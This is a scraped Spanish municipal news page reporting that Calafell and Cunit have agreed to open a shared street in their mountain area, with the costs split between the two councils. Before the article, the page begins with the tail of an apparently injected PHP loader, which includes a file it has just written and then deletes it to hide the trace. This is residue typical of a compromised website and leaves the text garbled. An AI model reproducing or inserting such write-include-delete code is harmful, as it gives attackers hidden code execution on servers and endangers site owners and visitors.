");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Calafell y Cunit abrirán una nueva calle que comunicará los dos municipios en la parte de montaña
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Calafell y Cunit abrirán una nueva calle que comunicará los dos municipios en la parte de montaña (07/10/2021)

Los ayuntamientos de Calafell y de Cunit han acordado la apertura de una nueva calle que comunicará los dos municipios en la parte de montaña. El nuevo vial conectará la avenida de Santa María de Montserrat, en Segur de Dalt de Calafell, y la calle del Crisantemo, en la urbanización Los Jardines de Cunit.

Ambos consistorios compartirán los gastos. Cunit se hace cargo de la redacción del proyecto y de la ejecución de las obras, mientras Calafell pagará la expropiación del terreno necesario en nuestro término municipal (Cunit ya dispone de los terrenos a su lado). Ambos municipios también tramitarán las modificaciones urbanísticas necesarias para hacer posible la realización del proyecto.

Ambos municipios ganan conectividad, consiguen nuevas salidas de emergencia en caso de incendio forestal y obtienen alternativas para acceder a las vías principales tan locales como comarcales y nacionales.

Fuente: Ayuntamiento de Calafell

Calafell y Cunit abrirán una nueva calle que comunicará los dos municipios en la parte de montaña

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona